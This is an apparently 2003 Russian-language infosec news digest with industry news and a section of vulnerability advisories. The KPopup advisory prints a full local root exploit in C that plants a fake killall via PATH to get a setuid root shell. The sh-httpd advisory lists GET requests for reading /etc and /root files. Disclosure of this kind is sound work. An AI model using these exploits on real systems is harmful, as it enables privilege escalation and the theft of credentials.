Рассылка закрыта
При закрытии подписчики были переданы в рассылку "Информационная безопасность: новости, статьи, обзоры" на которую и рекомендуем вам подписаться.
Вы можете найти рассылки сходной тематики в Каталоге рассылок.
15 новостей по информационной безопасности каждый день
Информационный Канал Subscribe.Ru |
Защитники интеллектуальной собственности автоматизируют документооборот
30 октября | Рубрика: Информационая безопасность бизнесаКомпания Cognitive Technologies объявила о завершении проекта по внедрению автоматизированной системы управления документами (АСУД) в московском офисе юридической фирмы "Городисский и партнеры". В основе проекта лежат базовые технологии электронного документооборота и обработки гибких шаблонов FlexyDocs. Целями проекта были переход на безбумажный документооборот, обеспечение комплексного контроля за процессом работы с документами, сокращение внутренних издержек.
Согласно условиям технического задания АСУД установлена в канцелярии и во всех 15 отделах фирмы "Городисский и Партнеры" и включает в себя более 200 рабочих мест. АСУД обеспечивает ввод, регистрацию и рассылку документов по исполнителям, контроль исполнения, оперативный поиск, ведение электронного архива, работу внутренней почтовой службы. Учитывая наличие у юридической фирмы "Городисский и Партнеры" большого числа зарубежных клиентов, АСУД позволяет обрабатывать документы не только на русском, но и на английском, немецком и французском языках.
АСУД отличает высокая степень автоматизации всех внутренних процессов с использованием элементов бизнес-интеллекта. В частности, система автоматически осуществляет ввод документов, поступающих по почте, факсу и электронной почте, их распознавание, самостоятельно анализирует содержание, вносит изъятые из документа реквизиты в регистрационную карточку и отправляет его в соответствующее подразделение фирмы.
Процесс оформления патентов жестко формализован. В АСУД четко прописаны все регламенты работы с документами по патентованию, как внутренние, так и ФИПС, и реализован комплексный механизм контроля за их соблюдением. В АСУД обеспечивается ведение глобальной базы данных, отражающей все этапы прохождения документов. В базе данных содержатся сведения о каждом зарегистрированном документе, а также о связанных с ним документах. Кроме того, в базе данных используется информация об исполнителях, участвующих в процессе документооборота, о предприятиях и организациях, с которыми они ведут переписку, извлекаемая из программного обеспечения "Городисский и Партнеры".
АСУД изначально рассчитана на работу с большими объемами документов. Ежедневно в систему вводится до 2000 документов. В электронном архиве хранится уже более 1 млн. документов.
В настоящее время идет подготовка к внедрению АСУД в региональных офисах фирмы "Городисский и Партнеры".
"Городисский и Партнеры" является юридической фирмой в области интеллектуальной собственности. Фирма имеет свои офисы в Москве, Санкт-Петербурге, Нижнем Новгороде, Самаре, Краснодаре, Екатеринбурге и Киеве (Украина). Через свои корреспондентские иностранные юридические фирмы и фирмы патентных поверенных компания представляет интересы клиентов в более чем 90 странах мира, включая СНГ и страны Балтии.
Источник: пресс-релиз компании Cognitive Technologies.
0Вычисления безопасные и открытые
30 октября | Рубрика: Технологии безопасности. Организации разработчики, интеграторы.Все чаще слышится требование ИТ-пользователей в адрес поставщиков технологий, чтобы они поддерживали открытые стандарты. Реакцией на эти запросы стали реальные и полезные шаги в направлении более открытой вычислительной среды.
К таким шагам можно отнести и инициативу по созданию базы цифровых подписей (БЦП) файлов, с помощью которой пользователи будут проверять подлинность файлов, составляющих их ПО и приложения.
Инициативу возглавляет фирма Tripwire и поддерживает ряд соучредителей, в частности компании IBM, Hewlett-Packard и Sun Microsystems, заявившие о своей твердой приверженности разработке более безопасных, надежных и экономичных стандартов.
По замыслу БЦП представляет собой репозиторий файловых метаданных, извлеченных из выпускаемого ПО, и учредители проекта уже ввели в нее свыше 11 млн. записей о "хороших" файлах.
Она будет доступна обладателям любых лицензированных приложений при предъявлении соответствующей удостоверяющей информации.
Репозиторий позволит проверять подлинность и целостность файлов различных операционных систем путем сравнения файлов с информацией, содержащейся в БЦП. Инициатива открыта для всех поставщиков ОС, приложений и инфраструктуры.
Поддержка репозитория со стороны производителей и их клиентов, вероятно, расширится после того, как зачинатели проекта представят (это должно произойти в следующем году) Web-сервис, с помощью которого основанная на открытых стандартах БЦП станет доступной через Интернет.
Пользователи смогут держать и пополнять эту базу данных и на своих серверах. Кроме того, БЦП поступит в распоряжение правительственных и правоохранительных ведомств.
Консорциум планирует представить общественности открыто опубликованный стандарт, но насколько он потеснит фирменные подходы, пока неизвестно.
Тем не менее уже на нынешней стадии ясно, что без участия Microsoft и ведущих дистрибьюторов Linux, таких, как Red Hat и SuSE, для многих пользователей подобный проект будет ущербным.
Как-никак, а в большинстве корпоративных вычислительных сред работает по нескольку разных ОС.
Руководство Red Hat на словах сообщило, что поддерживает данную инициативу. И, как отмечено в тексте исходного заявления учредителей проекта, идею приветствовал директор Microsoft по вопросам безопасности Ховард Шмидт.
Однако участником проекта Microsoft пока что не стала.
Хотя Microsoft выдвинула и свою инициативу под названием Trustworthy Computing, очень желательно, чтобы корпорация присоединилась к коллегиальной разработке открытых стандартов безопасных вычислений. IBM, Sun и HP тоже провозглашали собственные инициативы, позволяющие контролировать подлинность и целостность их ПО.
Но это не мешает всем трем компаниям поддерживать и совместный подход.
Мы идем к более интегрированной и автоматизированной ИТ-среде, и поэтому так важно иметь общий метод верификации целостности файлов в разнородных ОС.
Корпорациям Microsoft, Red Hat и SuSE следовало бы продемонстрировать свою приверженность процессу движения к открытым стандартам и присоединиться к IBM, Sun и HP в деле создания базы цифровых подписей файлов.
1Самара. В ближайшее время пройдет рабочее совещание по вопросам построения инфраструктуры удостоверяющих центров
30 октября | Рубрика: События, семинары, конференции, датыВнедрение электронной цифровой подписи (ЭЦП) в работу ведомств и коммерческих предприятий – одна из предпосылок развития в России наиболее современных информационно-коммуникационных технологий: электронной реализации гражданских отношений, электронных торгов, дистанционного обучения. Для работы над реализацией закона об электронной цифровой подписи при министерстве связи и информатизации РФ создана рабочая группа по удостоверяющим центрам. От Приволжского федерального округа в рабочую группу по удостоверяющим центрам при министерстве связи и информатизации РФ вошел генеральный директор ЗАО "Удостоверяющий центр" Георгий Афанасьев.
В октябре-ноябре с.г. проводится серия поездок по Приволжскому федеральному округу для подготовки материала "Единая инфраструктура удостоверяющих центров: окружной и региональный взгляд", который будет представлен членам рабочей группы. К настоящему моменту прошли рабочие встречи в Пермской области, Республике Татарстан, Ульяновской области, Нижегородской области и окружном таможенном комитете. Участники встреч – ответственные за информатизацию администраций, руководители департаментов информатизации МНС, пенсионного фонда, таможенного комитета.
Уже сейчас сформировано видение основных проблем внедрения ЭЦП. Прежде всего, это – межведомственные и межрегиональные барьеры. Все ведомства внедряют электронную цифровую подпись в свой документооборот, но, зачастую, без учета совместимости с аналогичными решениями других ведомств. Это приводит к перерасходу бюджетных средств на многократную разработку ведомственных удостоверяющих центров и дополнительным затратам для организаций, сдающих отчетность. Решение проблемы состоит в построении единой инфраструктуры удостоверяющих центров.
Как сообщает samara.ru, в ближайшее время рабочие совещания по вопросам построения инфраструктуры открытых ключей пройдут в Оренбурге, Уфе, Самаре и Саратове.
2Антивирус Касперского® получает очередную награду Virus Bulletin
30 октября | Рубрика: Технологии безопасности. Организации разработчики, интеграторы."Лаборатория Касперского", ведущий российский разработчик систем защиты от вирусов, хакерских атак и спама, сообщает о получении очередной награды британского журнала Virus Bulletin. По результатам проведенных редакцией тестов на платформе Windows 2003 Server Антивирус Касперского® 4.5 показал превосходные результаты по всем рассматриваемым в исследовании критериям. Программа вошла в число наиболее надежных, эффективных и удобных для пользователя антивирусных продуктов.
По итогам тестирования Антивирусу Касперского® 4.5 была присуждена
заслуженная награда - "VB100%", что еще раз подтверждает выдающиеся
функциональные и пользовательские качества продуктов "Лаборатории
Касперского".
Национальная премия по безопасности
30 октября | Рубрика: События, семинары, конференции, даты26 Апреля 2004 года состоится торжественная церемония вручения Национальной
Премии по безопасности.
Церемония награждения будет проходить в
присутствии федеральных министров, глав Комитетов Госдумы и Совета Федерации,
дипломатического корпуса, руководителей компаний – крупнейших выставочных
операторов и потребителей систем безопасности.
Организаторы Национальной
Премии по Безопасности начинают формирование пула информационных спонсоров
Премии и приглашают к партнёрству средства массовой информации, заинтересованные
в привлечении внимания общества, государства, бизнеса к передовому опыту
обеспечения безопасности.
За дополнительной информацией об условиях
партнёрства обращаться:
Отраслевые СМИ, работающие на рынке безопасности –
тел. (095) 792-5280
Контактное лицо – Светлана Рогачёва
Общеполитические и деловые СМИ – тел. (095) 251-6654
Контактное лицо
– Сергей Трапани
С уважением, Оргкомитет Национальной Премии по
Безопасности
Дополнительная информация на сайте http://www.secaward.ru
4
След банковской аферы ведет в Россию?
30 октября | Рубрика: Проблемные ситуации, информационная преступность, сетевые войныЗа недавнюю массовую рассылку мошеннических электронных писем, обманывающих
клиентов онлайновых банков, возможно, несет ответственность российский
преступный элемент. В прошлом месяце клиенты интернет-банков Barclays, Lloyds
TSB, Halifax, а позднее и NatWest, получили электронные письма, в которых их от
имени банка просили подтвердить сведения о личных счетах.
В письмах
содержалась гиперссылка на якобы официальный веб-сайт банка — на самом деле это
подложный сайт, собирающий информацию в преступных целях.
Афера
напоминает печально известные мошеннические письма «419», в которых мошенники
предлагали крупные суммы денег в обмен на помощь в переводе средств из Нигерии в
другие страны. Однако на этот раз источником жульничества, по мнению экспертов,
служит Россия.
Как сообщил ZDNet UK Пит Симпсон, менеджер отдела
ThreatLab секьюрити-фирмы Clearswift, надежных свидетельств того, что за этими
письмами стоят русские, пока нет, однако значительное их число исходит из одного
и того же источника.
«Похоже, они идут из России через ISP в Новой
Зеландии, но это не точно», — сказал Симпсон. По его словам, новая афера
организована лучше, чем афера 419, и представляет собой «согласованный проект, в
отличие от [той] спонтанной рыбалки».
Аферисты становятся все более
изобретательными в выманивании у людей ценной информации. Симпсон приводит в
пример недавние подозрительные письма, замаскированные под предложение хорошей
работы. В них сообщалось, что в шорт-лист на высокооплачиваемую работу вошли
всего 12 кандидатов, но получателю письма, если он ответит, гарантировали
преимущество.
Симпсон говорит, что последняя афера с письмами клиентам
банков вызовет проблемы лишь в том случае, если люди сразу откликнутся на эти
письма. «Такие аферы действуют недолго, так как если кто-то попался, то люди
быстро всполошатся и в считанные часы примут те или иные меры к отключению
преступного веб-сайта», — говорит он.
Письма были разосланы очень
многим, и аферистам для успеха достаточно всего нескольких откликов. «Мало кто
на это клюнет, но и этого хватит, чтобы аферисты были в барышах», — сказал
Симпсон.
5
Защита информации и интеллектуальной собственности: опасность дешевле упредить
30 октября | Рубрика: Технологии безопасности. Организации разработчики, интеграторы.Статистика компьютерной преступности неуклонно растет вверх. По оценкам,
полученным в ходе последнего исследования агентства Gartner, в ближайшие два
года пятая часть компаний во всем мире столкнется с серьезными проблемами,
связанными с безопасностью работы в сети Интернет. До 2005 года 20% компаний
будут подвержены атакам, которые поставят под угрозу их информацию и
интеллектуальную собственность.
В опубликованном отчете агентство
подчеркивает тот факт, что обычно становиться жертвой таких атак дороже, чем
предпринимать меры по их упреждению. «Незащищенный должным образом компьютер в
сети представляет собой потенциальную опасность для других компьютеров», -
заявляет Ричард Хантер (Richard Hunter), вице-президент Gartner. По его мнению
«Риски и затраты, связанные с безопасностью, велики и имеют тенденцию к
одновременному увеличению».
Ведущие специалисты по информационной
безопасности прогнозируют, что уже в конце 2004 года экономический ущерб от
киберпреступлений увеличится в 10-100 раз.
Эти неутешительные прогнозы
побуждают правительства многих стран срочно принимать соответствующие меры, как
на законодательном, так и организационном уровнях. В частности, правительством
США недавно принята новая Стратегия по защите информационных систем в Интернете
(бюджетом планируется выделение около 60 млрд. долл.), в совете Европы создается
специальный Комитет - «Агентство информационной безопасности», соответствующие
меры принимаются на уровне ООН.
В структуре Министерства национальной
безопасности США (DHS) появилось Национальное подразделение кибербезопасности,
главной задачей которого является предупреждение организаций и частных лиц о
появлении новых компьютерных вирусов и иных угроз в виртуальном пространстве.
Перед организацией также ставится задача обучения населения США основам
компьютерной безопасности.
Создание подобного подразделения особенно
актуально сегодня, когда количество киберпреступлений в мире стремительно
растет. В частности, по данным Координационного центра по компьютерной
безопасности (CERT), в первом квартале текущего года было зафиксировано 42
тысячи вторжений в защищенные сети, что более чем в два раза превышает
количество подобных случаев за весь 2002 год.
6
Три опасных дыры в MacOS 10.2
30 октября | Рубрика: Дыры и патчи программ и операционных средКомпания AtStake, специализирующаяся на проблемах компьютерной безопасности, выпустила три бюллетеня, посвященных дырам в операционных системах MacOS X версий 10.2.8 и младше. Первый из бюллетеней посвящен дыре, связанной с переполнением буфера при обработке длинных аргументов в командной строке. Переполнение позволяет хакеру выполнить в системе произвольный код с правами root. Кроме того, переполнение буфера приводит к сбою в ядре, краху системы и прекращению ведения записей в системном журнале.
Вторая дыра связана с неправильной установкой прав доступа к файлам и папкам приложений. Эта проблема имеет две различные причины: неправильную установку системой параметров доступа при перемещении папок и неправильные настройки программ их разработчиками. В обоих случаях злоумышленник имеет возможность подменить двоичный файл своим собственным, содержащим вирус или троян.
Последняя дыра связана с использованием базовых файлов (core files) и позволяет злоумышленнику считывать такие файлы, созданные процессами с правами root. Это может привести к похищению конфиденциальной информации, например, паролей. Все три уязвимости исправлены в новой версии MacOS X с кодовым названием Panther, недавно выпущенной Apple в продажу.
7Просмотр произвольных файлов и каталогов в InfronTech WebTide J2EE web application server
30 октября | Рубрика: Дыры и патчи программ и операционных сред
Программа: InfronTech WebTide Server 7.04 и более ранние версии Опасность: Средняя Наличие эксплоита: Да Описание: Уязвимость обнаружена в InfronTech WebTide J2EE web application server. Удаленный пользователь может просматривать файлы и каталоги на уязвимой системе. Удаленный пользователь может просматривать файлы и каталоги на системе, представляя запрос, заканчивающийся на '%3f.jsp'. URL производителя: http://www.infrontech.com/english/e-product_webtide.jsp Решение:Установите обновленную версию (7.05) программы. |
Удаленное переполнение буфера в thttpd
30 октября | Рубрика: Дыры и патчи программ и операционных сред
Программа: thttpd 2.21-2.23b1 Опасность: Критическая Наличие эксплоита: Да Описание: Уязвимость обнаружена в thttpd. Злонамеренный пользователь может скомпрометировать уязвимую систему. Уязвимость обнаружена в функции the "defang()" при обработке некоторых входных данных. В результате злонамеренный пользователь может представить специально обработанные входные данные, содержащие множественные символы "<" и ">", чтобы вызвать переполнение буфера и выполнить произвольный код на уязвимой системе. Пример/Эксплоит: URL производителя:http://www.acme.com/ Решение:Установите обновленную версию программы (2.24): http://www.acme.com/software/thttpd/thttpd-2.24.tar.gz |
Слабые разрешения в Apple Mac OS X
30 октября | Рубрика: Дыры и патчи программ и операционных сред
Программа: Mac OS X 10.2.8 и более ранние версии Опасность: Низкая Наличие эксплоита: Не нужен Описание: Несколько уязвимостей в разрешениях файла обнаружено в Mac OS X. Локальный пользователь может получить поднятые привилегии на целевой системе. Сообщается, что множество приложений устанавливают файлы и каталоги с привилегиями на запись. @stake не раскрывает уязвимые приложения. Также сообщается о недостатке в операционной системе. Когда пользователь переносит каталог из DMG образа диска, каталог адресата конфигурирован с read, write, и execute разрешениями, независимо от первоначальных разрешений на исходном каталоге. URL производителя: http://www.apple.com/macosx/ Решение: Установите обновленную версию системы Mac OS X (10.3). |
Две уязвимости в Apache Web сервере
30 октября | Рубрика: Дыры и патчи программ и операционных сред
Программа: Apache 1.3.28 и более ранние версии и Apache 2.0.47 и более ранние версии Опасность: Низкая Наличие эксплоита: нет Описание: Apache Software Foundation выпустил новую версию Apache Web сервера, в которой устраняются две уязвимости. Переполнение буфера обнаружено в "mod_alias" и "mod_rewrite", если они используют регулярные выражения с более чем 9 данными. Уязвимость может эксплуатироваться через специально сформированный .htaccess файл. В Apache2 должным образом не обрабатывается AF_UNIX сокет, который используется "mod_cgid" для связи с cgid демоном или CGI сценарием. URL производителя: http://httpd.apache.org/ Решение: Обновите сервер до 2.0.48 или 1.3.29: http://httpd.apache.org/download.cgi |
Межсайтовый скриптинг в Symantec Norton Internet Security 2003
30 октября | Рубрика: Дыры и патчи программ и операционных сред
Программа: Symantec Norton Internet 6.0.4.34 Опасность: Низкая Наличие эксплоита: Нет Описание: Уязвимость в проверке правильности входных данных обнаружена в Symantec's Norton Internet Security 2003. Удаленный пользователь может выполнить XSS нападение Когда Norton Internet Security блокирует определенный URL, то страница, которая отображает заблокированный URL, не фильтрует HTMl код, содержащийся в URL. Удаленный пользователь может сконструировать специально сформированный URL, который выполнить произвольный код в браузере целевого пользователя, просматривающего злонамеренную ссылку, в контексте заблокированного сайта. URL производителя: http://www.symantec.com/sabu/nis/nis_pe/index.html Решение: Установите обновленную версию программы, доступную через LiveUpdate. |
Несколько уязвимостей в KPopup
30 октября | Рубрика: Дыры и патчи программ и операционных сред
Программа: KPopup 0.9.1 Опасность: Средняя Наличие эксплоита: Да Описание: Уязвимость обнаружена в KPopup. Локальный пользователь может получить root привилегии на целевой системе. Приложение небезопасно выполняет вызов system() и содержит несколько уязвимостей форматной строки. Например, локальный пользователь может эксплуатировать недостаток в system() в 'misc.cpp': killall -USR1 kpopupЛокальный пользователь может сконструировать альтернативный 'killall'и изменить путь таким образом, чтобы выполнить альтернативный 'killall' с root привилегиями при запуске KPopup. Пример/Эксплоит: /*Local root exploit for kpopup *by b0f www.b0f.net */ #include <stdio.h> int main() setenv("PATH=/tmp:/usr/kerberos/sbin:/usr/kerberos/bin:/usr/local/sbin:\ /usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin:/usr/X11R6/bin:/root/bin:"); FILE *fd; fd = fopen("/tmp/killall", "w");{ fprintf(fd, "#!/bin/sh\n"); fprintf(fd, "cd /tmp\n"); fprintf(fd, "/bin/cat > shell.c << EOF\n"); fprintf(fd, "#include <stdio.h>\n"); fprintf(fd, "int main()\n"); fprintf(fd, "{\n"); fprintf(fd, "setuid(0);\n"); fprintf(fd, "setgid(0);\n"); fprintf(fd, "execl(\"/bin/bash\", \"-bash\", NULL);\n"); fprintf(fd, "return 0;\n"); fprintf(fd, "}\n"); fprintf(fd, "EOF\n"); fprintf(fd, "/usr/bin/gcc /tmp/shell.c -o /tmp/shell\n"); fprintf(fd, "/bin/chown root.root /tmp/shell\n"); fprintf(fd, "/bin/chmod 6711 /tmp/shell\n"); fprintf(fd, "echo NOW HERE IS YOUR ROOT SHELL\n"); fprintf(fd, "/tmp/shell\n"); fclose(fd); system("chmod +x /tmp/killall"); system("/usr/local/kde/bin/kpopup root shell"); return 0; URL производителя: http://www.henschelsoft.de/kpopup_en.html Решение:Способов устранения обнаруженной уязвимости не существует в настоящее время. |
Отказ в обслуживании против Sun Solaris в NFS
30 октября | Рубрика: Дыры и патчи программ и операционных сред
Программа: Sun Solaris 7.0-9.0 Опасность: Низкая Наличие эксплоита: Нет Описание: Уязвимость обнаружена в Solaris. Злонамеренный пользователь может выполнить DoS нападение. Уязвимость связанна с ошибкой в NFS при обработке некоторых некорректных запросов. Удаленный атакующий может послать специально обработанный клиентский запрос к общедоступной UFS файловой системе, чтобы нарушить работу UFS на уязвимом сервере. URL производителя: http://www.sun.com Решение: Установите соответствующие исправления: -- SPARC Platform -- Solaris 7: http://sunsolve.sun.com/pub-cgi/findPatch.pl?patchId=106541&rev=27 Solaris 8: http://sunsolve.sun.com/pub-cgi/findPatch.pl?patchId=108528&rev=24 Solaris 9: http://sunsolve.sun.com/pub-cgi/findPatch.pl?patchId=113454&rev=11 -- x86 Platform -- Solaris 7: http://sunsolve.sun.com/pub-cgi/findPatch.pl?patchId=106542&rev=27 Solaris 8: http://sunsolve.sun.com/pub-cgi/findPatch.pl?patchId=108529&rev=24 Solaris 9: http://sunsolve.sun.com/pub-cgi/findPatch.pl?patchId=114563&rev=07 |
Просмотр произвольных файлов на системе в 'sh-httpd' web сервере
30 октября | Рубрика: Дыры и патчи программ и операционных сред
Программа: sh-httpd 0.3, 0.4 Опасность: Средняя Наличие эксплоита: Да Описание: Уязвимость обнаружена в 'sh-httpd' web сервере. Удаленный пользователь может просматривать произвольные файлы на целевой системе. Удаленный пользователь может представить запрос, содержащий '*' символы, чтобы просматривать файлы и каталоги на целевой системе. Пример/Эксплоит: GET * GET ./././sh-httpd/p* GET /././etc/s* GET ././root/.b* URL производителя: http://lrp.steinkuehler.net/Packages/weblet.htm Решение: Способов устранения обнаруженной уязвимости не существует в настоящее время. Неофициальный патч: === sh-httpd.patch === --- sh-httpd-0.4/sh-httpd Mon Oct 9 11:28:05 2000 +++ sh-httpd.patch Sat Jul 19 08:51:44 2003 @@ -31,7 +31,7 @@ bname() { local IFS='/' - set -- $1 + set -- "$1" eval rc="\$$#" [ "$rc" = "" ] && eval rc="\$$(($# - 1))" echo "$rc" @@ -262,7 +262,7 @@ # Split URI into base and query string at ? IFS='?' - set -- $URI + set -- "$URI" QUERY_STRING="$2" URL="$1" IFS=$OIFS @@ -292,7 +292,7 @@ fi DIR="dname $URL" - FILE="bname $URL" + FILE="bname "$URL"" # Check for existance of directory if [ ! -d "$DOCROOT/$DIR" ]; then === eof === |
Обход ограничений доступа в Oracle Collaboration Suite
30 октября | Рубрика: Дыры и патчи программ и операционных сред
Программа: Oracle Collaboration Suite Release 1 Опасность: Низкая Наличие эксплоита: Нет Описание: Уязвимость обнаружена в Oracle Collaboration Suite. Злонамеренный пользователь может получить доступ к ограниченным файлам. Oracle WebCache кэширует файлы вне зависимости от каких либо ограничений, наложенных Oracle Files. Злонамеренный пользователь может просматривать ограниченные файлы. Oracle WebCache и Oracle Files установлены по умолчанию как часть Oracle Collaboration Suite. URL производителя: http://www.oracle.com Решение: Установите 3036419 патч, который можно скачать отсюда: http://metalink.oracle.com/ |
Ссылки: |
Разнообразие операционных систем не выход
30 октября | Рубрика: Технологии безопасности. Организации разработчики, интеграторы.Продолжает вызывать споры обращение экспертов, опубликованное в сентябре, в котором критиковалась возрастающая зависимость федеральной электронной системы США от программных продуктов Microsoft, что, по мнению авторов письма, увеличивает вероятность массированных кибератак.
Текст доклада был представлен на заседании Ассоциации компьютерной и коммуникационной индустрии (CCIA). Данная торговая группа в прошлом уже выступала с замечаниями в адрес корпорации Microsoft. На этот раз ее представители выступили против повсеместного использования ОС Windows, сравнив продукт с сельскохозяйственной монокультурой. Засилье одной программы, по словам специалистов, приводит к повышению уязвимости систем.
Однако не все эксперты придерживаются одинакового мнения. Так, Майкл Гартенберг (Michael Gartenberg) не согласен с тем, что диверсификация программного обеспечения является решением проблемы безопасности. В своем встречном докладе он пишет, что компьютеры не будут лучше защищены только потому, что на них установлены разные операционные системы. Более того, компаниям придется пойти на дополнительные расходы, связанные с необходимостью организации техподдержки нескольких продуктов, вместо какого-то одного. Тратиться придется и на совместимость, и, опять же, на защиту от нападений хакеров.
«Ошибочно думать, будто безопасность сводится к установке различных ОС», — пишет Гартенберг, указывая далее, что 16 из 29 предупреждений группы CERN, выпущенных в течение 2002 года, касаются Linux и других продуктов с открытым кодом. «Любая популярная ОС немедленно привлекает внимание авторов вирусов и хакеров, и монокультура здесь ни при чем», — считает аналитик.
В свою очередь Дэниэл Гир (Daniel Geer), один из авторов нашумевшего сентябрьского выступления, продолжает настаивать на своей точке зрения и даже предлагает некий рецепт решения проблемы:
— корпорация Microsoft должна опубликовать детализации к основным функциональным компонентам кода — это касается не только ОС Windows, но и пакета Office;
— необходима скорейшая разработка альтернативных способов выполнения функций; здесь нужен подход подобный тому, в результате которого возникла технология «plug and play»;
— важно совместно с распространителями компьютерных компонентов и программного обеспечения обозначить инструкции для будущих разработок подобно тому, как интернет-сообщество утверждает новые протоколы, описывая каждый в соответствующем документе (RFC).
Логика Гартенберга проще: он считает, что лучшая защитная тактика, какую фирмы могут взять на вооружение, — это ориентация на профилактические меры. Вместо раздумий над возможностью сэкономить при помощи диверсификации, руководители должны убедиться в том, что обновления к ОС устанавливаются своевременно, также полезно пользоваться программами защиты (firewall). «Установка разнородных операционных систем может лишь повысить расходы по эксплуатации и снизить эффективность работы компании. Вряд ли, например, онлайн-магазинам так уж нужно иметь дело с малоизвестными продуктами», — пишет Гартенберг.
Все же Гартенберг не отрицает, что смена операционной системы может иметь смысл, если связана в первую очередь с возможностью улучшить качество работы компании.
17В США может быть введен налог на интернет
30 октября | Рубрика: Информационные ресурсыОдной из самых давних мистификаций в интернете является гуляющее по сети письмо, в котором говорится, что правительство разрабатывает налог на электронную почту. Но если Конгресс США не продлит истекающий на этой неделе мораторий на налогообложение интернета, налог на электронную почту, возможно, скоро перестанет быть городской сплетней, пишет The Wall Street Journal в материале, перевод которого публикует Inopressa.Ru и newsru.com.
Нынешний мораторий - закон об освобождении интернета от налогов - запрещает налогообложение доступа в интернет, двойное налогообложение покупок, сделанных через сеть, и дискриминационное налогообложение, при котором к сетевым приобретениям относятся иначе, чем к обычным.
Результаты этих запретов, действующих с 1998 года, оказались именно такими, на какие рассчитывали авторы закона, конгрессмен-республиканец Крис Кокс и сенатор-демократ Рон Уайден: количество пользователей интернета стремительно увеличивается, электронная коммерция расширяется, а имущественные границы размываются. По данным министерства торговли, самым быстрорастущим сегментом пользователей интернета являются семьи с доходом менее 25 тыс. долларов в год.
Но все это окажется под угрозой, если в пятницу налоговые запреты утратят силу. Законопроект, делающий эти положения постоянными, был принят палатой представителей в сентябре, но застрял в сенате, где республиканец из Вирджинии Джордж Аллен столкнулся с сопротивлением нескольких республиканцев, решивших нарядиться на Хэллоуин демократами.
Под давлением Национальной ассоциации губернаторов и других структур, считающих цифровые сделки в киберпространстве дойной коровой, Джордж Войнович из Огайо и Ламар Александр из Теннеси примкнули к демократам и остановили прохождение закона. Если они преуспеют, и действия запретов закончится, то налог на интернет станет реальностью.
"Стоимость доступа в добрый старый интернет может вырасти вдвое", - предсказал на прошлой неделе сенатор Уайден. И это только начало. В отсутствии закона, способного их остановить, чиновники на уровне штатов и отдельных населенных пунктов начнут облагать налогами все - от антиспамовых фильтров до поиска в Google.
Налоги только на электронную почту - это уже золотая жила для политиков по всей стране. На майских слушаниях о спаме в сенате демократ Марк Дейтон предложил "подумать об очень маленькой плате за каждое отправленное сообщение".
Он не одинок. Штатам и городам идея понравилась не только из-за возможности обложить налогами электронную почту. Губернаторы, мэры и окружные чиновники мыслят локально. Сообщение, которое вы отправили своему соседу, вполне может пройти через сервера, находящиеся в местах, подпадающих под юрисдикцию 7,6 тыс. различных налоговых управлений страны.
"Мы неоднократно слышали в конгрессе, что представители штатов хотят воспользоваться этим как налогооблагаемой базой, - говорит конгрессмен Кокс. - Интернет по своей природе уязвим для такого вида множественного налогообложения. Именно из-за множественного налогообложения мы ввели в действие запреты".
18Windows погубила универсального солдата
30 октября | Рубрика: Информационая безопасность государственной властиВооруженные силы США, которые пытаются оснастить солдат принципиально новой экипировкой, приняли решение упростить ее. Поводом для этого стали неудачные испытания системы Land Warrior, проведенные в июле 2003 года.
Одним из недостатков системы является ее высокая энергоемкость. Аккумуляторы, которые обеспечивают работу системы, весят примерно 1 кг и ныне их хватает всего лишь на 150 минут бесперебойной работы. Статистика войны в Ираке показывает, что средняя продолжительность боевого столкновения составляла, по меньшей мере 300 минут. Однако главной проблемой стали фатальные недостатки программного обеспечения. Изначально универсальные солдаты должны были пользоваться операционной системой MS Windows, соответствующим образом адаптированной для военных нужд.
Однако использование MS Windows приводило к постоянному "зависанию" компьютеров и несколько месяцев назад было принято решение создать программное обеспечение на Linux.
Если очередные испытания пройдут успешно, то Министерство Обороны США планирует в 2006 году закупить около 47 тыс. подобных комплектов. Впрочем, сроки принятия этой техники на вооружение ВС США переносились уже три раза: изначально планировалось, что первый боеспособный комплект появится в 2001 году. Кроме того сегодня достоверно неизвестно, насколько эффективны будут универсальные солдаты на поле боя - теоретически их противник сможет перехватывать сигналы, прерывать их и даже отдавать фальшивые приказы.
19SCO назвала GPL-лицензии антиконституционными
30 октября | Рубрика: Технологии безопасности. Организации разработчики, интеграторы.На слушаниях дела в суде IBM против SCO Group последняя назвала GPL-лицензии "ни к чему не обязывающими, антиконституционными и недействительными". IBM подал в суд на компанию за нарушение этих лицензий после того, как SCO сделала свой UNIX коммерческим и подала в суд на IBM за то, что тот продолжал использовать GPL-разработки SCO. Представитель компании сказал, что требования IBM соблюдать GPL, по сути, незаконны.
Напомним, что по условиям "Общей публичной лицензии" (GPL) программные продукты поставляются бесплатно, с исходными кодами и каждый имеет право их усовершенствовать и обязан распространять улучшенные варианты также бесплатно. GPL выборочно защищена организацией Free Software Foundation.
"GPL нарушает конституцию США, а также законы об авторских правах, антитрастовые законы и законы о контроле над экспортом", - сказал юрист SCO.
Источник: The Register и сnews
20Эти и другие новости читайте на сайте Стра.тег
http://subscribe.ru/
E-mail: ask@subscribe.ru |
Отписаться
Убрать рекламу |
В избранное | ||